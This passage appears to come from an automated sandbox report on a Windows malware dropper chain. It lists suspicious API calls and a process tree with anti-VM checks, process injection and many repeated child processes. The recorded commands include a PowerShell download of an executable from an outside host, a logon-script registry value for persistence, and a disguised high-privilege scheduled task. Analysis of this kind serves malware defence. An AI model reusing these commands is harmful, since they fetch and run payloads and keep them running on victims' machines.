Token: SeShutdownPrivilege	1784	explorer.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2488	sihost.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1592	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1920	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
1784	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe
6080	explorer.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
4388	HmngBpR.exe
1148	StartMenuExperienceHost.exe
2836	TextInputHost.exe
2836	TextInputHost.exe
2940	StartMenuExperienceHost.exe
2848	TextInputHost.exe
2848	TextInputHost.exe
3996	StartMenuExperienceHost.exe
5888	SearchApp.exe
736	TextInputHost.exe
736	TextInputHost.exe
3700	StartMenuExperienceHost.exe
1844	SearchApp.exe
3824	TextInputHost.exe
3824	TextInputHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2596 wrote to memory of 1684	2596	random.exe	80
PID 2596 wrote to memory of 1684	2596	random.exe	80
PID 2596 wrote to memory of 1684	2596	random.exe	80
PID 1684 wrote to memory of 5912	1684	u0k28.exe	81
PID 1684 wrote to memory of 5912	1684	u0k28.exe	81
PID 1684 wrote to memory of 5912	1684	u0k28.exe	81
PID 5912 wrote to memory of 1156	5912	1u87m9.exe	82
PID 5912 wrote to memory of 1156	5912	1u87m9.exe	82
PID 5912 wrote to memory of 1156	5912	1u87m9.exe	82
PID 1684 wrote to memory of 4208	1684	u0k28.exe	83
PID 1684 wrote to memory of 4208	1684	u0k28.exe	83
PID 1684 wrote to memory of 4208	1684	u0k28.exe	83
PID 4208 wrote to memory of 4216	4208	2x8387.exe	85
PID 4208 wrote to memory of 4216	4208	2x8387.exe	85
PID 4208 wrote to memory of 4216	4208	2x8387.exe	85
PID 2596 wrote to memory of 5552	2596	random.exe	86
PID 2596 wrote to memory of 5552	2596	random.exe	86
PID 2596 wrote to memory of 5552	2596	random.exe	86
PID 1156 wrote to memory of 2456	1156	rapes.exe	87
PID 1156 wrote to memory of 2456	1156	rapes.exe	87
PID 1156 wrote to memory of 2456	1156	rapes.exe	87
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 2456 wrote to memory of 5024	2456	d19abfa281.exe	88
PID 1156 wrote to memory of 2652	1156	rapes.exe	90
PID 1156 wrote to memory of 2652	1156	rapes.exe	90
PID 1156 wrote to memory of 2652	1156	rapes.exe	90
PID 1156 wrote to memory of 3364	1156	rapes.exe	91
PID 1156 wrote to memory of 3364	1156	rapes.exe	91
PID 1156 wrote to memory of 3364	1156	rapes.exe	91
PID 3364 wrote to memory of 4384	3364	zY9sqWs.exe	92
PID 3364 wrote to memory of 4384	3364	zY9sqWs.exe	92
PID 3364 wrote to memory of 4384	3364	zY9sqWs.exe	92
PID 4384 wrote to memory of 404	4384	Gxtuum.exe	93
PID 4384 wrote to memory of 404	4384	Gxtuum.exe	93
PID 4384 wrote to memory of 3996	4384	Gxtuum.exe	95
PID 4384 wrote to memory of 3996	4384	Gxtuum.exe	95
PID 3996 wrote to memory of 2880	3996	Bthvgkck.exe	51
PID 1156 wrote to memory of 5660	1156	rapes.exe	97
PID 1156 wrote to memory of 5660	1156	rapes.exe	97
PID 1156 wrote to memory of 5660	1156	rapes.exe	97
PID 1156 wrote to memory of 4388	1156	rapes.exe	98
PID 1156 wrote to memory of 4388	1156	rapes.exe	98
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 2880 wrote to memory of 4448	2880	sihost.exe	99
PID 4388 wrote to memory of 2536	4388	HmngBpR.exe	101
PID 4388 wrote to memory of 2536	4388	HmngBpR.exe	101
PID 4388 wrote to memory of 2536	4388	HmngBpR.exe	101
PID 2536 wrote to memory of 6124	2536	SplashWin.exe	102
PID 2536 wrote to memory of 6124	2536	SplashWin.exe	102
PID 2536 wrote to memory of 6124	2536	SplashWin.exe	102
PID 6124 wrote to memory of 4416	6124	SplashWin.exe	103

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4448

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5912
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1156
    - - C:\Users\Admin\AppData\Local\Temp\10003000101\d19abfa281.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\d19abfa281.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2456
      - C:\Users\Admin\AppData\Local\Temp\10003000101\d19abfa281.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\d19abfa281.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5024
    - - C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2652
    - - C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3364
      - C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3996
    - - C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5660
    - - C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4388
      - C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2536
        
        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:6124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4416
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        9⤵
        
        PID:5916
    - - C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"
        5⤵
        Executes dropped EXE
        
        PID:1644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5280
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5824
      - C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe"
        6⤵
        
        PID:5988
        
        C:\Windows\Temp\{2E8702A5-A9A7-4DA5-B589-28AC44420E95}\.cr\rsfff01fff.exe
        
        "C:\Windows\Temp\{2E8702A5-A9A7-4DA5-B589-28AC44420E95}\.cr\rsfff01fff.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe" -burn.filehandle.attached=672 -burn.filehandle.self=680
        7⤵
        
        PID:3516
        
        C:\Windows\Temp\{9B230179-6F11-4210-80DC-AABA6E56F6A2}\.ba\irestore.exe
        
        C:\Windows\Temp\{9B230179-6F11-4210-80DC-AABA6E56F6A2}\.ba\irestore.exe
        8⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exe
        
        C:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exe
        9⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        10⤵
        
        PID:3972
    - - C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5920
      - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3184
        
        C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        7⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        8⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        7⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        8⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 980
        8⤵
        Program crash
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
        7⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1256
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        7⤵
        
        PID:6088
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
        7⤵
        
        PID:7020
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:5924
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:2632
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:6684
    - - C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"
        5⤵
        
        PID:5868
    - - C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"
        5⤵
        
        PID:3236
    - - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        5⤵
        
        PID:5876
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5284
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3016
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5600
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3672
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4688
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1408
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4932
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2940
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1580
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4856
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3808
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4004
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4896
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2484
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5068
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3700
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5704
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3220
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4296
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4600
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4596
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4912
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2444
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4152
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:732
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4300
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2848
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:560
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5888
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3108
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1784
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1692
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2620
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:524
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6048
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4512
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3448
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3780
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6112
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4168
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2036
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5004
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1484
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5256
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4104
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3736
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1996
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5532
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5960
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4804
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2468
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3964
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
